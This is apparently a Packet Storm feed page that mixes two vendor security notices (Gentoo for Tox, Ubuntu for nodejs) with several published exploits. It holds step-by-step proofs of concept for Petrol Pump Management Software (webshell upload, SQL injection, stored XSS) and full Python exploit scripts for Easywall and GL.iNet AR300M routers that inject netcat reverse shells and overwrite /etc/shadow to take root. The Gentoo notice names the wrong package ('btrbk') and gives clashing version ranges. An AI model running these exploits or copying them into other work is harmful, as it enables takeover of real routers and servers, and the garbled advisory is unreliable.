Gentoo Linux Security Advisory 202403-1 - A vulnerability has been discovered in Tox which may lead to remote code execution. Versions greater than or equal to 0.2.13 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Tox: Remote Code Execution  
     Date: March 03, 2024  
     Bugs: #829650  
       ID: 202403-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Tox which may lead to remote code  
execution.

Background  
==========

Tox is easy-to-use software that connects you with friends and family  
without anyone else listening in.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
net-libs/tox  < 0.2.13      >= 0.2.13

Description  
===========

A vulnerability has been discovered in btrbk. Please review the CVE  
identifier referenced below for details.

Impact  
======

A stack-based buffer overflow allows remote attackers to crash the  
process or potentially execute arbitrary code via a network packet.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Tox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/tox-0.2.13"

References  
==========

[ 1 ] CVE-2021-44847  
      https://nvd.nist.gov/vuln/detail/CVE-2021-44847

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-01

Petrol Pump Management System version 1.0 suffers from a remote shell upload vulnerability. This is a variant vector of attack in comparison to the original discovery attributed to SoSPiro in February of 2024.

    # Exploit Title: File Upload Remote Code Execution (RCE) in Petrol PumpManagement Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27747# Description: File Upload vulnerability in Petrol Pump Management Softwarev.1.0 allows an attacker to execute arbitrary code via a crafted payload tothe email Image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the phpinfo.php file in "Image" field5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page6. The content of phpinfo.php file is given below:<?php phpinfo();?># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27747

Petrol Pump Management System 1.0 Shell Upload

Petrol Pump Management Software version 1.0 suffers from a remote SQL injectionvulnerability.

    # Exploit Title: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0.# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27746# Description: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the email address parameter in the index.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with username: test@test.com';SELECT SLEEP(10)# andPassword=test3. Page will load for 10 seconds because of time-based sql injection# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27746

Petrol Pump Management Software 1.0 SQL Injection

Petrol Pump Management Software version 1.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27743# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the Address parameter in the add_invoices.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"4. Fill the payload "<script>alert(0)</script>" in "Address" field5. Stored XSS will be present in "http://localhost/fuelflow/admin/manage_invoices.php" page# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27743-----# Exploit Title: Cross Site Scripting vulnerability via SVG in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27744# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the xss.svg file in "Image" field5. Stored XSS will be present in "http://localhost/fuelflow/assets/images/xss.svg" page6. The content of the xss.svg file is given below:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"stroke="#004400"/>  <script type="text/javascript">    alert("XSS by Shubham Pandey");  </script></svg># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27744

Petrol Pump Management Software 1.0 Cross Site Scripting

This is an interesting whitepaper called Compromising Industrial Processes using Web-Based Programmable Logic Controller Malware. The authors present a novel approach to developing programmable logic controller (PLC) malware that proves to be more flexible, resilient, and impactful than current strategies.

Compromising Industrial Processes Using Web-Based Programmable Logic Controller Malware

Easywall version 0.3.1 suffers from an authenticated remote command execution vulnerability.

    # Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution# Date: 30-11-2023# Exploit Author: Melvin Mejia# Vendor Homepage: https://jpylypiw.github.io/easywall/# Software Link: https://github.com/jpylypiw/easywall# Version: 0.3.1# Tested on: Ubuntu 22.04import requests, json, urllib3urllib3.disable_warnings()def exploit():        # Replace values needed here    target_host = "192.168.1.25"    target_port= "12227"    lhost = "192.168.1.10"    lport = "9001"    user = "admin"    password = "admin"        target = f"https://{target_host}:{target_port}"    # Authenticate to the app    print("[+] Attempting login with the provided credentials...")    login_data = {"username":user, "password":password}    session = requests.session()    try:        login = session.post(f'{target}/login',data=login_data,verify=False)    except Exception as ex:        print("[!] There was a problem connecting to the app, error:", ex)        exit(1)    if login.status_code != 200:        print("[!] Login failed.")        exit(1)    else:        print("[+] Login successfull.")            # Send the payload, the port parameter suffers from a command injection vulnerability    print("[+] Attempting to send payload.")    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'    data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}    send_payload = session.post(f"{target}/ports-save",data=data,verify=False)    if send_payload.status_code != 200:        print("[!] Failed to send payload.")        exit(1)    else:        print("[+] Payload sent.")    # Trigger the execution of the payload    print("[+] Attempting execution.")    data = {"step_1":"", "step_2":""}    execute = session.post(f"{target}/apply-save",data=data, verify=False)    if execute.status_code != 200:        print("[!] Attempt to execute failed.")        exit(1)    else:        print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")exploit()

Easywall 0.3.1 Remote Command Execution

Ubuntu Security Notice 6672-1 - Morgan Jones discovered that Node.js incorrectly handled certain inputs that leads to false positive errors during some cryptographic operations. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 23.10. It was discovered that Node.js incorrectly handled certain inputs leaded to a untrusted search path vulnerability. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform a privilege escalation.

==========================================================================  
Ubuntu Security Notice USN-6672-1  
March 04, 2024

nodejs vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Node.js.

Software Description:  
- nodejs: An open-source, cross-platform JavaScript runtime environment.

Details:

Morgan Jones discovered that Node.js incorrectly handled certain inputs that  
leads to false positive errors during some cryptographic operations. If a user  
or an automated system were tricked into opening a specially crafted input  
file, a remote attacker could possibly use this issue to cause a denial of  
service. This issue only affected Ubuntu 23.10. (CVE-2023-23919)

It was discovered that Node.js incorrectly handled certain inputs leaded to a  
untrusted search path vulnerability. If a user or an automated system were  
tricked into opening a specially crafted input file, a remote attacker could  
possibly use this issue to perform a privilege escalation. (CVE-2023-23920)

Matt Caswell discovered that Node.js incorrectly handled certain inputs with  
specially crafted ASN.1 object identifiers or data containing them. If a user  
or an automated system were tricked into opening a specially crafted input  
file, a remote attacker could possibly use this issue to cause a denial of  
service. This issue only affected Ubuntu 22.04 LTS. (CVE-2023-2650)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libnode108                      18.13.0+dfsg1-1ubuntu2.1  
   nodejs                          18.13.0+dfsg1-1ubuntu2.1

Ubuntu 22.04 LTS:  
   libnode72                       12.22.9~dfsg-1ubuntu3.4  
   nodejs                          12.22.9~dfsg-1ubuntu3.4

Ubuntu 20.04 LTS:  
   libnode64                       10.19.0~dfsg-3ubuntu1.5  
   nodejs                          10.19.0~dfsg-3ubuntu1.5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6672-1  
   CVE-2023-23919, CVE-2023-23920, CVE-2023-2650

Package Information:  
   https://launchpad.net/ubuntu/+source/nodejs/18.13.0+dfsg1-1ubuntu2.1  
   https://launchpad.net/ubuntu/+source/nodejs/12.22.9~dfsg-1ubuntu3.4  
   https://launchpad.net/ubuntu/+source/nodejs/10.19.0~dfsg-3ubuntu1.5

Ubuntu Security Notice USN-6672-1

GL.iNet AR300M versions 3.216 and below suffer from an OpenVPN client related remote code execution vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar# Version: 3.216# Tested on: GL.iNet AR300M# CVE: CVE-2023-46456import socketimport requestsimport readlinefrom time import sleepfrom random import randintfrom sys import stdout, argvfrom threading import Threadrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def generate_random_string():  return ''.join([chr(randint(97, 122)) for x in range(6)])def add_config_file(url, auth_token, payload):  data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}  try:    r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while adding configuration file')    return False  return Truedef verify_config_file(url, auth_token, payload):  try:    r = requests.get(url, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()    if not r.json()['passed'] and payload not in r.json()['passed']:      return False  except requests.exceptions.RequestException:    print('[X] Error while verifying the upload of configuration file')    return False  return Truedef add_client(url, auth_token):  postdata = {'description':'RCE_client_{}'.format(generate_random_string())}  try:    r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while adding OpenVPN client')    return False  return Truedef get_client_id(url, auth_token, payload):  try:    r = requests.get(url, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()    for conn in r.json()['clients']:      if conn['defaultserver'] == payload:        return conn['id']    print('[X] Error: could not find client ID')    return False  except requests.exceptions.RequestException:    print('[X] Error while retrieving added OpenVPN client ID')  return Falsedef connect_vpn(url, auth_token, client_id):  sleep(0.25)  postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}  r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)def cleanup(url, auth_token, client_id):  try:    r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while cleaning up OpenVPN client')    return False  return Truedef get_command_response(s):  res = ''  while True:    try:      resp = s.recv(1).decode('utf-8')      res += resp    except UnicodeDecodeError:      pass    except socket.timeout:      break  return resdef revshell_listen(revshell_ip, revshell_port):  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.settimeout(5)  try:    s.bind((revshell_ip, int(revshell_port)))    s.listen(1)  except Exception as e:    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))    exit(1)  try:    clsock, claddr = s.accept()    clsock.settimeout(2)    if clsock:      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))      res = ''      while True:        command = input('$ ')        clsock.sendall('{}\n'.format(command).encode('utf-8'))        stdout.write(get_command_response(clsock))  except socket.timeout:    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')    s.close()  except KeyboardInterrupt:    print('\n[*] Closing connection')    try:      clsock.close()    except socket.error:      pass    except NameError:      pass    s.close()def main(base_url, auth_token, revshell_ip, revshell_port):  print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')  payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)  print('[+] Filename payload: "{}"'.format(payload))  print('[*] Uploading crafted OpenVPN config file')  if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):    exit(1)  if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):    exit(1)  print('[+] File uploaded successfully')  print('[*] Adding OpenVPN client')  if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):    exit(1)  client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)  if not client_id:    exit(1)  print('[+] Client ID: ' + client_id)  print('[*] Triggering connection to created OpenVPN client')  Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))  revshell_listen(revshell_ip, revshell_port)  print('[*] Clean-up by removing OpenVPN connection')  if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):    exit(1)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 5:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))    exit(1)  main(argv[1], argv[2], argv[3], argv[4])

GL.iNet AR300M 3.216 Remote Code Execution

GL.iNet AR300M versions 4.3.7 and below suffer from an OpenVPN client related remote code execution vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar# Version: 4.3.7# Tested on: GL.iNet AR300M# CVE: CVE-2023-46454import socketimport requestsimport readlinefrom time import sleepfrom random import randintfrom sys import stdout, argvfrom threading import Threadrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def trigger_revshell(url, auth_token, payload):  sleep(0.25)  data = {    'jsonrpc': '2.0',    'id': randint(1000, 9999),    'method': 'call',    'params': [      auth_token,      'plugins',      'get_package_info',      {'name': 'bas{}e-files'.format(payload)}    ]  }  requests.post(url, json=data, verify=False)def get_command_response(s):  res = ''  while True:    try:      resp = s.recv(1).decode('utf-8')      res += resp    except UnicodeDecodeError:      pass    except socket.timeout:      break  return resdef revshell_listen(revshell_ip, revshell_port):  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.settimeout(5)  try:    s.bind((revshell_ip, int(revshell_port)))    s.listen(1)  except Exception as e:    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))    exit(1)  try:    clsock, claddr = s.accept()    clsock.settimeout(2)    if clsock:      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))      res = ''      while True:        command = input('$ ')        clsock.sendall('{}\n'.format(command).encode('utf-8'))        stdout.write(get_command_response(clsock))  except socket.timeout:    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')    s.close()  except KeyboardInterrupt:    print('\n[*] Closing connection')    try:      clsock.close()    except socket.error:      pass    except NameError:      pass    s.close()def main(base_url, auth_token, revshell_ip, revshell_port):  print('[+] Started GL.iNet <= 4.3.7 RCE exploit')  payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)  print('[+] Reverse shell payload: "{}"'.format(payload))  print('[*] Triggering reverse shell connection')  Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))  revshell_listen(revshell_ip, revshell_port)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 5:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))    exit(1)  main(argv[1], argv[2], argv[3], argv[4])

GL.iNet AR300M 4.3.7 Remote Code Execution

GL.iNet AR300M versions 4.3.7 and below suffer from an arbitrary file writing vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar# Version: 4.3.7# Tested on: GL.iNet AR300M# CVE: CVE-2023-46455import cryptimport requestsfrom sys import argvrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def craft_shadow_file(salted_password):  shadow_content  = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)  shadow_content += 'daemon:*:0:0:99999:7:::\n'  shadow_content += 'ftp:*:0:0:99999:7:::\n'  shadow_content += 'network:*:0:0:99999:7:::\n'  shadow_content += 'nobody:*:0:0:99999:7:::\n'  shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'  shadow_content += 'stubby:x:0:0:99999:7:::\n'  shadow_content += 'ntp:x:0:0:99999:7::\n'  shadow_content += 'mosquitto:x:0:0:99999:7::\n'  shadow_content += 'logd:x:0:0:99999:7::\n'  shadow_content += 'ubus:x:0:0:99999:7::\n'  return shadow_contentdef replace_shadow_file(url, auth_token, shadow_content):  data = {    'sid': (None, auth_token),    'size': (None, '4'),    'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),    'file': ('shadow', shadow_content)  }  requests.post(url, files=data, verify=False)def main(base_url, auth_token):  print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')  password = input('[?] New password for root user: ')  salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)  shadow_content = craft_shadow_file(salted_password)  print('[+] Crafted shadow file:\n{}'.format(shadow_content))  print('[*] Replacing shadow file with the crafted one')  replace_shadow_file(base_url+'/upload', auth_token, shadow_content)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 3:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))    exit(1)  main(argv[1], argv[2])

Source

Packet Storm